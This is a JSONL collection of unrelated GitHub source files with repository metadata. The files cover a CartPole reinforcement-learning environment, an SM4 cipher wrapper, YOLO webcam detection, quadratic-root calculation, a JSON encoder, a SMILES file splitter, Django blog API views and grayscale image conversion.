+{"seq_id":"32636675851","text":"import numpy as np\nimport math\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\nfrom os import path\nfrom scipy.integrate import odeint\n\nfrom ..utils import ImageEncoder\nfrom ..gym_wrapper import GymWrapper\n\n__all__ = ['CartPole']\n\nclass GymCartPole(gym.Env):\n metadata = {\n 'render.modes': ['human', 'rgb_array'],\n 'video.frames_per_second': 50\n }\n\n def __init__(self, *args, **kwargs):\n self.gravity = 9.8\n self.masscart = 1.0\n self.masspole = 0.1\n self.total_mass = (self.masspole + self.masscart)\n self.length = 0.5 # actually half the pole's length\n self.polemass_length = (self.masspole * self.length)\n self.max_force = 10.0\n self.tau = 0.02 # seconds between state updates\n\n # Angle at which to fail the episode\n self.theta_threshold_radians = 0.21 #12 * 2 * np.pi / 360\n self.x_threshold = 0.5 #2.4\n\n # Angle limit set to 2 * theta_threshold_radians so failing observation is still within bounds\n high = np.array([\n self.x_threshold * 2,\n np.finfo(np.float32).max,\n self.theta_threshold_radians * 2,\n np.finfo(np.float32).max])\n\n self.action_space = spaces.Box(low=-self.max_force, high=self.max_force, shape=(1,))\n self.observation_space = spaces.Box(-high, high)\n\n self.seed()\n self.viewer = None\n self.state = None\n\n self.steps_beyond_done = None\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def dynamics(self, st, t, u):\n x, x_dot, theta, theta_dot = st\n # force = np.clip(u, -self.max_force, self.max_force)[0]\n force = u[0]\n # print(force, u)\n costheta = np.cos(theta)\n sintheta = np.sin(theta)\n temp = (force + self.polemass_length * theta_dot * theta_dot * sintheta) / self.total_mass\n thetaacc = (self.gravity * sintheta - costheta* temp) / (self.length * (4.0/3.0 - self.masspole * costheta * costheta / self.total_mass))\n xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass\n # x = x + self.tau * x_dot\n # x_dot = x_dot + self.tau * xacc\n # theta = theta + self.tau * theta_dot\n # theta_dot = theta_dot + self.tau * thetaacc\n dx = x_dot\n dx_dot = xacc\n dtheta = theta_dot\n dtheta_dot = thetaacc\n return np.array([dx, dx_dot, dtheta, dtheta_dot])\n\n def step(self,action):\n #assert self.action_space.contains(action), \"%r (%s) invalid\"%(action, type(action))\n #print (f\"state {self.counter} : {self.state}\")\n self.counter += 1\n state = self.state\n\n x, x_dot, theta, theta_dot = self.state\n cost = x**2 + theta**2 + x_dot**2 + theta_dot**2 + (action[0]**2)\n\n N = 2\n t = np.linspace(0, self.tau, N)\n self.state = odeint(self.dynamics, self.state, t, args=(action, ))[-1, :]\n # print(self.state)\n # print(action)\n # self.state = self.dynamics(state, action)\n x, x_dot, theta, theta_dot = self.state\n\n done = x < -self.x_threshold \\\n or x > self.x_threshold \\\n or x_dot < -self.x_threshold \\\n or x_dot > self.x_threshold \\\n or theta < -self.theta_threshold_radians \\\n or theta > self.theta_threshold_radians \\\n or theta_dot < -self.theta_threshold_radians \\\n or theta_dot > self.theta_threshold_radians\n done = bool(done)\n\n if not done:\n cost = -1.0\n else:\n cost = 1.0\n\n return self.state, -cost, False, {}\n\n def reset(self):\n self.counter = 0\n self.state = self.np_random.uniform(low=-0.05, high=0.05, size=(4,))\n # self.state = np.array([0.05, 0.05, 0.05, 0.05])\n self.steps_beyond_done = None\n return self.state\n\n def render(self, mode='human'):\n # screen_width = 600\n # screen_height = 
400\n\n # world_width = self.x_threshold * 2\n # scale = screen_width/world_width\n # carty = 100 # TOP OF CART\n # polewidth = 10.0\n # polelen = scale * (2 * self.length)\n # cartwidth = 50.0\n # cartheight = 30.0\n\n # if self.viewer is None:\n # from gym.envs.classic_control import rendering\n # self.viewer = rendering.Viewer(screen_width, screen_height)\n # l, r, t, b = -cartwidth / 2, cartwidth / 2, cartheight / 2, -cartheight / 2\n # axleoffset = cartheight / 4.0\n # cart = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\n # self.carttrans = rendering.Transform()\n # cart.add_attr(self.carttrans)\n # self.viewer.add_geom(cart)\n # l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\n # pole = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\n # pole.set_color(.8, .6, .4)\n # self.poletrans = rendering.Transform(translation=(0, axleoffset))\n # pole.add_attr(self.poletrans)\n # pole.add_attr(self.carttrans)\n # self.viewer.add_geom(pole)\n # self.axle = rendering.make_circle(polewidth/2)\n # self.axle.add_attr(self.poletrans)\n # self.axle.add_attr(self.carttrans)\n # self.axle.set_color(.5, .5, .8)\n # self.viewer.add_geom(self.axle)\n # self.track = rendering.Line((0, carty), (screen_width, carty))\n # self.track.set_color(0, 0, 0)\n # self.viewer.add_geom(self.track)\n\n # self._pole_geom = pole\n\n # if self.state is None:\n # return None\n\n # # Edit the pole polygon vertex\n # pole = self._pole_geom\n # l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\n # pole.v = [(l, b), (l, t), (r, t), (r, b)]\n\n # x = self.state\n # cartx = x[0] * scale + screen_width / 2.0 # MIDDLE OF CART\n # self.carttrans.set_translation(cartx, carty)\n # self.poletrans.set_rotation(-x[2])\n\n # return self.viewer.render(return_rgb_array=mode == 'rgb_array')\n print(self.counter, self.state)\n\n def close(self):\n if self.viewer:\n self.viewer.close()\n self.viewer = None\n\n\nclass CartPole(GymWrapper):\n\n environment_name = 'CartPole'\n entry_point = \"marvelgym.openai.cartpole:GymCartPole\"\n max_episode_steps = 50\n reward_threshold = -3.75 # ignore\n\n def __init__(self, **kwargs):\n config = {\n 'image': kwargs.pop('image', False),\n 'sliding_window': kwargs.pop('sliding_window', 0),\n 'image_dim': kwargs.pop('image_dim', 32),\n }\n super(CartPole, self).__init__(config)\n\n # def cost_fn(self, s, a):\n # x, x_dot, theta, theta_dot = s[:,0], s[:,1], s[:,2], s[:,3]\n # return x**2 + theta**2 + x_dot**2 + theta_dot**2 + (np.squeeze(a)**2)\n\n def torque_matrix(self):\n return 2e-4 * np.eye(self.get_action_dim()) #0.002\n\n def make_summary(self, observations, name):\n pass\n\n def is_image(self):\n return self.image\n\n def image_size(self):\n if self.image:\n return [self.image_dim, self.image_dim, 3]\n return None\n\n def start_recording(self, video_path):\n frame_shape = (800, 1200, 3)\n self.image_encoder = ImageEncoder(video_path, frame_shape, 30)\n\n def grab_frame(self):\n frame = self.render(mode='rgb_array')\n self.image_encoder.capture_frame(frame)\n\n def stop_recording(self):\n self.image_encoder.close()\n\n #specifications\n def training_settings(self):\n return {\n \"dp\": False,\n \"ilqr\": False,\n \"trpo\": True,\n \"training_iters\": 1,\n \"learning_rate\": 0.0001,\n \"train_safe\": True,\n \"train_ind\": True,\n \"train_reach\": False,\n \"train_performance\": False,\n \"lb_start\": np.array([-0.05,-0.05,-0.05,-0.05]),\n \"ub_start\": np.array([ 0.05, 0.05, 0.05, 0.05]),\n \"lb_safe\": 
np.array([-0.5,-0.5, -0.5, -0.5]),\n \"ub_safe\": np.array([ 0.5, 0.5, 0.5, 0.5]),\n \"lb_reach\": np.array([0., 0., 0., 0.]),\n \"ub_reach\": np.array([0., 0., 0., 0.]),\n \"lb_action\": None,\n \"ub_action\": None,\n \"lb_avoids\": None,\n \"ub_avoids\": None,\n }\n","repo_name":"RU-Automated-Reasoning-Group/VEL","sub_path":"training/marvelgym/openai/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"9079670664","text":"import typing\nfrom dataclasses import dataclass\n\nfrom tongsuopy.crypto.ciphers import AEADEncryptionContext, Cipher, CipherContext, algorithms, modes\n\nfrom bkcrypto import constants, types\n\nfrom .. import configs\nfrom ..options import SM4SymmetricOptions\nfrom . import base\n\n\n@dataclass\nclass SM4SymmetricRuntimeConfig(configs.BaseSM4SymmetricConfig, base.BaseSymmetricRuntimeConfig):\n\n mode_class: types.SM4ModeClass = None\n\n def __post_init__(self):\n super().__post_init__()\n\n key_sizes: typing.Set[int] = {key_size // 8 for key_size in algorithms.SM4.key_sizes}\n if self.key_size not in key_sizes:\n raise ValueError(f\"Optional key sizes are {key_sizes}, but got {self.key_size}\")\n\n try:\n self.mode_class = {\n constants.SymmetricMode.CTR: modes.CTR,\n constants.SymmetricMode.CBC: modes.CBC,\n constants.SymmetricMode.GCM: modes.GCM,\n constants.SymmetricMode.CFB: modes.CFB,\n }[self.mode]\n\n except KeyError:\n raise ValueError(f\"Unsupported mode: {self.mode}\")\n\n\nclass SM4SymmetricCipher(base.BaseSymmetricCipher):\n\n CIPHER_TYPE: str = constants.SymmetricCipherType.SM4.value\n\n CONFIG_DATA_CLASS: typing.Type[SM4SymmetricRuntimeConfig] = SM4SymmetricRuntimeConfig\n\n OPTIONS_DATA_CLASS: typing.Type[SM4SymmetricOptions] = SM4SymmetricOptions\n\n config: SM4SymmetricRuntimeConfig = None\n\n def __init__(\n self,\n key: typing.Optional[typing.Union[bytes, str]] = None,\n **options,\n ):\n super().__init__(key, **options)\n if self.config.key and len(self.config.key) < self.config.key_size:\n self.config.key += b\"\\x00\" * (self.config.key_size - len(self.config.key))\n\n def get_block_size(self) -> int:\n return algorithms.SM4.block_size // 8\n\n def _encrypt(self, plaintext_bytes: bytes, encryption_metadata: base.EncryptionMetadata) -> bytes:\n\n mode_init_args: typing.List[bytes] = []\n if self.config.enable_iv:\n mode_init_args.append(encryption_metadata.iv)\n cipher: Cipher = Cipher(algorithms.SM4(self.config.key), self.config.mode_class(*mode_init_args))\n cipher_ctx: typing.Union[CipherContext, AEADEncryptionContext] = cipher.encryptor()\n if self.config.enable_aad:\n cipher_ctx.authenticate_additional_data(encryption_metadata.aad)\n ciphertext_bytes: bytes = cipher_ctx.update(plaintext_bytes)\n ciphertext_bytes += cipher_ctx.finalize()\n\n if self.config.mode == constants.SymmetricMode.GCM:\n encryption_metadata.tag = cipher_ctx.tag\n return ciphertext_bytes\n\n def _decrypt(self, ciphertext_bytes: bytes, encryption_metadata: base.EncryptionMetadata) -> bytes:\n\n mode_init_args: typing.List[bytes] = []\n if self.config.enable_iv:\n mode_init_args.append(encryption_metadata.iv)\n if encryption_metadata.tag:\n mode_init_args.append(encryption_metadata.tag)\n\n cipher: Cipher = Cipher(algorithms.SM4(self.config.key), self.config.mode_class(*mode_init_args))\n cipher_ctx: typing.Union[CipherContext, AEADEncryptionContext] = cipher.decryptor()\n if self.config.enable_aad:\n cipher_ctx.authenticate_additional_data(encryption_metadata.aad)\n plaintext_bytes = cipher_ctx.update(ciphertext_bytes)\n plaintext_bytes += cipher_ctx.finalize()\n return plaintext_bytes\n","repo_name":"TencentBlueKing/crypto-python-sdk","sub_path":"bkcrypto/symmetric/ciphers/sm4.py","file_name":"sm4.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"5187168032","text":"from PIL import Image\n\nimport torch\nimport torchvision.transforms.functional as TF\nimport visualpriors\nimport subprocess\nimport cv2\nimport numpy as np\n\nmode = ['autoencoding', 'depth_euclidean']# 'reshading', 'keypoints2d', 'edge_occlusion','curvature', 'edge_texture', 'keypoints3d', 'segment_unsup2d', 'segment_unsup25d','normal','segment_semantic', 'denoising' , 'inpainting',\n # 'class_object',\n # 'jigsaw', 'room_layout','class_scene', 'egomotion', 'nonfixated_pose','fixated_pose', 'point_matching', 'vanishing_point']\ntool = 'cv'\n#not impletemented: 'jigsaw', 'room_layout','class_scene', 'egomotion', 'nonfixated_pose','fixated_pose', 'point_matching', 'vanishing_point'\n# mismatch: 'class_object'\n# \n#'colorization',\n#\n#\n# \n# Download a test image\n# subprocess.call(\"curl -O https://raw.githubusercontent.com/StanfordVL/taskonomy/master/taskbank/assets/test.png\", shell=True)\n\n# Load image and rescale/resize to [-1,1] and 3x256x256\nif tool=='pil':\n image = Image.open('./test/test.png')\n print(type(image))\n x = TF.to_tensor(TF.resize(image, 256)) * 2 - 1\n print(x.dtype)\n print(type(x))\nelse:\n image=cv2.imread('./test/test.png')\n x=torch.from_numpy(image)\n print(x.dtype)\n x = TF.to_tensor(image) * 2 - 1\n # x = x.permute(2,0,1).float()* 2 - 1\n print(x.dtype)\nx = x.unsqueeze_(0)\n\nfor i, m in enumerate(mode):\n\n try:\n representation = visualpriors.representation_transform(x, m, device='cpu')\n print(representation.shape)# torch.Size([1, 8, 16, 16])\n except:\n print(m)\n\n # Transform to normals feature and then visualize the readout\n pred = visualpriors.feature_readout(x, m, device='cpu')\n\n # Save it\n TF.to_pil_image(pred[0] / 2. + 0.5).save('test_{}_readout.png'.format(m))","repo_name":"GELIELEO/attention_on_midlevel","sub_path":"tests/visualpriors_test.py","file_name":"visualpriors_test.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"30383956959","text":"import cv2\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Load Yolo\r\nnet = cv2.dnn.readNet(\"/home/kasztp/git/yolov3/yolov3.weights\", \"/home/kasztp/git/yolov3/yolov3.cfg\")\r\nclasses = []\r\nwith open(\"/home/kasztp/git/yolov3/coco.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\nlayer_names = net.getLayerNames()\r\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\nfont = cv2.FONT_HERSHEY_PLAIN\r\n\r\nwhile(True):\r\n # Capture frame-by-frame\r\n ret, frame = cap.read()\r\n\r\n height,width,channels = frame.shape\r\n # Detecting objects\r\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\r\n net.setInput(blob)\r\n outs = net.forward(output_layers)\r\n\r\n #Showing info on screen/ get confidence score of algorithm in detecting an object in blob\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n confidence = scores[class_id]\r\n if confidence > 0.5:\r\n #object detected\r\n center_x= int(detection[0]*width)\r\n center_y= int(detection[1]*height)\r\n w = int(detection[2]*width)\r\n h = int(detection[3]*height)\r\n\r\n #rectangle co-ordinaters\r\n x=int(center_x - w/2)\r\n y=int(center_y - h/2)\r\n\r\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,255,255),1)\r\n cv2.putText(frame,classes[class_id],(x,y),font,1,(255,255,255),1) \r\n\r\n # Display the resulting frame\r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# When everything done, release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"kasztp/yolo-test","sub_path":"yolo1.py","file_name":"yolo1.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"21910752856","text":"#MINHA FORMULA\n\nimport math\n\na=float(input(\"\\nDigite o valor de A:\\n\\n\"))\nb=float(input(\"\\nDigite o valor de B:\\n\\n\"))\nc=float(input(\"\\nDigite o valor de C:\\n\\n\"))\n\nwhile a==0:\n a=float(input(\"O valor de 'a' não pode ser ZERO, por favor digite outro valor:\\n\\n\"))\n\nelse:\n delta=b**2-4*a*c\n print(\"\\n\\nDelta é:\",delta,\"\\n\\n\")\n\n if delta<0:\n print(\"Não tem raiz real.\\n\\n\")\n\n elif delta==0:\n raiz1=(-b+math.sqrt(delta))/(2*a)\n print(\"Tem 1 raiz real.\\n\\n\")\n print(\"A raiz real é:\",raiz1,\"\\n\\n\")\n\n elif delta>0:\n raiz1=(-b+math.sqrt(delta))/(2*a)\n raiz2=(-b-math.sqrt(delta))/(2*a)\n print(\"Tem 2 raizes reais.\\n\\n\")\n print(\"As raizes reais são:\",raiz1,\"\\n\\n\")\n print(\"As raizes reais são:\",raiz2,\"\\n\\n\")\n\n#FORMULA PROFESSOR\n\ndeltaprof = b ** 2 - 4 * a * c\n\nif deltaprof == 0:\n raiz1 =(-b + math.sqrt(deltaprof)) / (2 * a)\n print(\"EQUACAO PROF: A única raiz é: \", raiz1,\"\\n\\n\")\nelse:\n if deltaprof < 0:\n print(\"EQUACAO PROF: A equação não possui raízes reais\\n\\n\")\n else:\n raiz1 = (-b + math.sqrt(deltaprof)) / (2 * a)\n raiz2 = (-b - math.sqrt(deltaprof)) / (2 * a)\n print(\"EQUACAO PROF: A primeira raiz é: \",raiz1,\"\\n\\n\")\n print(\"EQUACAO PROF: A segunda raiz é: \",raiz2,\"\\n\\n\")\n\n","repo_name":"cgsmendes/aulas","sub_path":"if-else-formulabascara.py","file_name":"if-else-formulabascara.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"9067396311","text":"\"\"\"Json serialization utilities.\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport datetime\nimport decimal\nimport uuid\n\nfrom six import text_type\n\nfrom celery.utils.imports import symbol_by_name\n\ntry:\n from django.utils.functional import Promise as DjangoPromise\nexcept ImportError: # pragma: no cover\n class DjangoPromise(object): # noqa\n pass\n\n__all__ = ['JsonEncoder', 'dumps']\n\n_JSON_EXTRA_ARGS = {\n 'simplejson': {'use_decimal': False},\n}\n\n\ndef get_best_json(attr=None,\n choices=['simplejson', 'json']):\n for i, module in enumerate(choices):\n try:\n sym = ':'.join([module, attr]) if attr else module\n return symbol_by_name(sym), _JSON_EXTRA_ARGS.get(module, {})\n except (AttributeError, ImportError):\n if i + 1 >= len(choices):\n raise\n\n\njson, _json_args = get_best_json()\n\n\nclass JsonEncoder(get_best_json('JSONEncoder')[0]):\n \"\"\"Thorn custom Json encoder.\n\n Notes:\n Same as django.core.serializers.json.JSONEncoder but preserves\n datetime microsecond information.\n \"\"\"\n\n def default(self, o,\n dates=(datetime.datetime, datetime.date),\n times=(datetime.time,),\n textual=(decimal.Decimal, uuid.UUID, DjangoPromise),\n isinstance=isinstance,\n datetime=datetime.datetime,\n text_type=text_type):\n if isinstance(o, dates):\n if not isinstance(o, datetime):\n o = datetime(o.year, o.month, o.day, 0, 0, 0, 0)\n r = o.isoformat()\n if r.endswith(\"+00:00\"):\n r = r[:-6] + \"Z\"\n return r\n elif isinstance(o, times):\n return o.isoformat()\n elif isinstance(o, textual):\n return text_type(o)\n else:\n return super(JsonEncoder, self).default(o)\n\n\ndef dumps(obj, encode=json.dumps, cls=JsonEncoder):\n \"\"\"Serialize object as json string.\"\"\"\n return encode(obj, cls=cls, **_json_args)\n","repo_name":"robinhood/thorn","sub_path":"thorn/utils/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":514,"dataset":"github-code","pt":"35"}
+{"seq_id":"2668443141","text":"\"\"\"Split all files into small parts.\n\"\"\"\nimport gzip\nimport shutil\nimport tempfile\nimport argparse\nimport subprocess\nfrom pathlib import Path\nfrom datetime import datetime as dt\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument(\"-s\", \"--smiles\", nargs='+', required=True)\nparser.add_argument(\"-l\", \"--length\", default=1000000, type=int, help=\"number of lines in each part, default 1,000,000\")\nparser.add_argument(\"-o\", \"--output_dir\", required=True)\nargs = parser.parse_args()\n\n\ndef page_generator_from_files(smiles_files, length):\n page = []\n count = 0\n for smi in smiles_files:\n print(\"{}: loading {}\".format(dt.now(), smi))\n smi = Path(smi)\n if smi.suffix == '.gz':\n f = gzip.open(smi, 'rt')\n else:\n f = open(smi, 'r')\n for i in f:\n if count < length:\n page.append(i)\n count += 1\n else:\n yield page\n page = []\n count = 0\n if page:\n yield page\n\nstart = dt.now()\n\noutput = Path(args.output_dir)\nfile_count = 0\nfor page in page_generator_from_files(args.smiles, args.length):\n file_count += 1\n # save under dirs separately for job submitting.\n file_dir = output / 'd.{:04d}'.format(file_count)\n file_dir.mkdir(parents=True, exist_ok=True)\n file_path = file_dir / \"{}.{:04d}.smi\".format(output.stem, file_count)\n with open(file_path, 'w') as f:\n f.writelines(page)\n print(\"{}: saved {}\".format(dt.now(), file_path))\nprint(\"Total elapsed time: {}\".format(dt.now()-start))\n","repo_name":"hnlab/can-ai-do","sub_path":"dude/zinc_rdkit_psql/split_into_parts.py","file_name":"split_into_parts.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"}
+{"seq_id":"28602213966","text":"from posts.models import (\n Post,\n Category,\n BlogLike,\n BlogComment,\n CommentLike,\n Author\n\n)\nfrom .serializers import (\n PostSerializer,\n CategorySerializer,\n LikeGetSerializer,\n LikeSerializer,\n BlogComment,\n CommentGetSerializer,\n CommentPostSerializer,\n CommentPutSerializer,\n AuthorSerializer,\n PostCreateSerializer\n\n\n)\nfrom django.db.models import Count\nfrom .services.comment_view import create_comment\nfrom .services.like_view import press_like_to_product\nfrom rest_framework.views import APIView\nfrom django.views.decorators.http import require_GET\nfrom django.db.models import Q\nfrom ipware import get_client_ip\nfrom django.db import IntegrityError\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics, pagination, viewsets\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate\nfrom django.http import JsonResponse\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass AuthorPostsAPIView(generics.ListAPIView):\n serializer_class = PostSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user_id = self.request.user\n author=Author.objects.get(user=user_id)\n return Post.objects.filter(author=author)\n\nclass AuthorPostsListCreateAPIView(generics.ListCreateAPIView):\n serializer_class = PostCreateSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user_id = self.request.user\n author = Author.objects.get(user=user_id)\n return Post.objects.filter(author=author)\n\n def perform_create(self, serializer):\n user_id = self.request.user\n author = Author.objects.get(user=user_id)\n # serializer.save(author=author)\n post = serializer.save(author=author)\n categories = self.request.data.get('categories', [])\n post.categories.set(categories)\n\nclass PostUpdateDeleteView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = [IsAuthenticated] \n\nclass PostList(generics.ListCreateAPIView):\n # queryset=Post.objects.all()\n serializer_class = PostSerializer\n\n def get_queryset(self):\n category = self.request.query_params.get('category', None)\n title = self.request.query_params.get('title', None)\n if category:\n queryset = Post.objects.filter(categories=category)\n elif title:\n queryset = Post.objects.filter(title__icontains=title)\n else:\n queryset = Post.objects.all()\n return queryset\n\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Post.objects.all()\n # permission_classes=[IsAuthenticated]\n serializer_class = PostSerializer\n lookup_field = 'pk'\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.increase_views()\n \"\"\"\n when deply it in a host you can increse by evey ip\n \"\"\"\n # Get the user's IP address\n # ip_address, _ = get_client_ip(request)\n\n # if ip_address: # If IP is detected\n # instance.increment_views(ip_address) # Call the increment_views method\n\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n\nclass CategoryList(generics.ListCreateAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n\n# popular 
post\n\nclass MostViewedPostsAPIView(generics.ListAPIView):\n    queryset = Post.objects.filter(status=True).order_by(\n        '-views')[:8] # Query for popular posts\n    serializer_class = PostSerializer\n\n\nclass MostLikedPostsAPIView(generics.ListAPIView):\n    queryset = Post.objects.filter(status=True).annotate(\n        like_count=Count('bloglike')).order_by('-like_count')[:8]\n    serializer_class = PostSerializer\n# Blog tags list\n\n\nclass TagBlogList(generics.ListCreateAPIView):\n    serializer_class = PostSerializer\n\n    def get_queryset(self):\n        tag = self.kwargs['tag']\n        queryset = Post.objects.filter(tags__icontains=tag)\n        return queryset\n\n\nclass LikeView(APIView):\n    # permission_classes = [IsAuthenticated]\n\n    def get(self, request, *args, **kwargs):\n        if kwargs:\n            queryset = BlogLike.objects.filter(\n                blog_item__pk=kwargs[\"blog_item_pk\"])\n            serializer = LikeGetSerializer(queryset, many=True)\n        else:\n            queryset = BlogLike.objects.all()\n            serializer = LikeGetSerializer(queryset, many=True)\n\n        return Response(serializer.data)\n\n    def post(self, request, *args, **kwargs):\n\n        user = User.objects.get(pk=int(request.data[\"user_id\"]))\n        post = Post.objects.get(pk=int(request.data[\"blog_item\"]))\n        like = BlogLike.objects.filter(user=user, blog_item=post)\n        if like.exists():\n            # a repeated like removes the existing row (toggle off)\n            like.delete()\n            msg = False\n        else:\n            BlogLike.objects.create(\n                user=user, blog_item=post, like_status=True)\n            msg = True\n        return Response({\"msg\": msg})\n\n\n@csrf_exempt\n@require_GET\ndef search_blogs(request):\n    search_query = request.GET.get('q', '')\n\n    # Perform the search query on the Blog model\n    search_results = Post.objects.filter(\n        Q(title__icontains=search_query) | Q(body__icontains=search_query)\n    )\n\n    # Serialize the search results\n    serialized_results = [{'title': blog.title, 'body': blog.body}\n                          for blog in search_results]\n\n    return JsonResponse(serialized_results, safe=False)\n\n# =========== comments views\n\n\nclass CommentBlogView(APIView):\n    # permission_classes = [IsAuthenticated]\n\n    def get(self, request, *args, **kwargs):\n\n        if kwargs:\n            queryset = BlogComment.objects.filter(\n                blog_item__pk=kwargs[\"blog_item\"], parent=None\n            )\n            serializer = CommentGetSerializer(\n                queryset, many=True, context={'request': request})\n        else:\n            queryset = BlogComment.objects.all()\n            serializer = CommentGetSerializer(\n                queryset, many=True, context={'request': request})\n        return Response(serializer.data)\n\n    def post(self, request, *args, **kwargs):\n        serializer = CommentPostSerializer(data=request.data)\n        user = User.objects.get(pk=int(request.data[\"user_id\"]))\n\n        if serializer.is_valid():\n            comment = create_comment(**serializer.data, user=user)\n            return Response(\n                CommentGetSerializer(instance=comment, context={\n                    'request': request}).data,\n                status=status.HTTP_201_CREATED,\n            )\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def put(self, request, pk):\n        post = BlogComment.objects.get(pk=pk)\n        data = {**request.data, \"user\": request.user.id}\n        serializer = CommentPutSerializer(instance=post, data=data)\n        if serializer.is_valid():\n            instance = serializer.save()\n            newSerializer = CommentGetSerializer(\n                instance=instance, context={'request': request})\n            return Response(newSerializer.data, status=status.HTTP_200_OK)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def delete(self, request, pk):\n        post = BlogComment.objects.get(pk=pk)\n        post.delete()\n        return Response({\"message\": \"Item was successfully deleted\"})\n\n\n# class 
CommentLikeView(APIView):\n#     permission_classes = [IsAuthenticated]\n\n#     def get(self, request, *args, **kwargs):\n#         if kwargs:\n#             queryset = CommentLike.objects.filter(\n#                 comment_blog_item__blog_item__pk=kwargs[\"comment_blog_item_pk\"]\n#             )\n#             serializer = CommentLikeGetSerializer(queryset, many=True)\n#         else:\n#             queryset = CommentLike.objects.all()\n#             serializer = CommentLikeGetSerializer(queryset, many=True)\n\n#         return Response(serializer.data)\n\n#     def post(self, request, *args, **kwargs):\n#         serializer = CommentLikePostSerializer(data=request.data)\n#         if serializer.is_valid():\n#             like_id = press_like_to_comment(request, request.data[\"comment_blog_item\"])\n#             return Response(\n#                 {**serializer.data, \"like_id\": like_id}, status=status.HTTP_201_CREATED\n#             )\n#         return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# @api_view([\"GET\"])\n# @permission_classes([IsAuthenticated])\n# def check_comment_like_exists(request, comment_id):\n#     user = request.user\n#     try:\n#         CommentLike.objects.get(user=user, comment_blog_item__id=comment_id)\n#         return Response({\"result\": True})\n#     except Exception as e:\n#         return Response({\"result\": False})\n\n\n# @api_view([\"GET\"])\n# @permission_classes([IsAuthenticated])\n# def get_blogs_for_user(request):\n#     user = request.user\n#     queryset = user.blogitem_set.all()\n\n#     serializer = BlogSerializer(queryset, many=True)\n#     return Response(serializer.data)\n","repo_name":"abbasalirezaei/Django-React-Bolg-App-","sub_path":"backend/posts/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"12944767569","text":"import cv2\n\nimg = cv2.imread(\"castle.jpg\",1)\n# work on two copies of the original image; the old code re-read\n# 'castle-gray1.jpg'/'castle-gray2.jpg', files that were never created\ngray1 = img.copy()\ngray2 = img.copy()\nrow,col,color = gray1.shape\n\n#first method - using mean formula\nfor i in range(0,row):\n    for j in range(0,col):\n        b,g,r = gray1[i,j]\n        gray=(int(r)+int(g)+int(b))/3\n        gray1[i,j]=gray\ncv2.imshow('castle - grayscale - mean formula',gray1)\ncv2.imwrite('castle-mean-formula.jpg',gray1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#second method - using luminosity formula\nfor i in range(0, row):\n    for j in range(0, col):\n        b,g,r=gray2[i,j]\n        gray=(int(b)*0.07 + int(g)*0.72 + int(r)*0.21)\n        gray2[i,j]=gray\ncv2.imwrite('castle-luminosity-formula.jpg',gray2)\ncv2.imshow('castle - grayscale - luminosity formula',gray2)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"rohit-mp/ImgProc-OpenCV","sub_path":"ColorToGray/color-to-grayscale.py","file_name":"color-to-grayscale.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
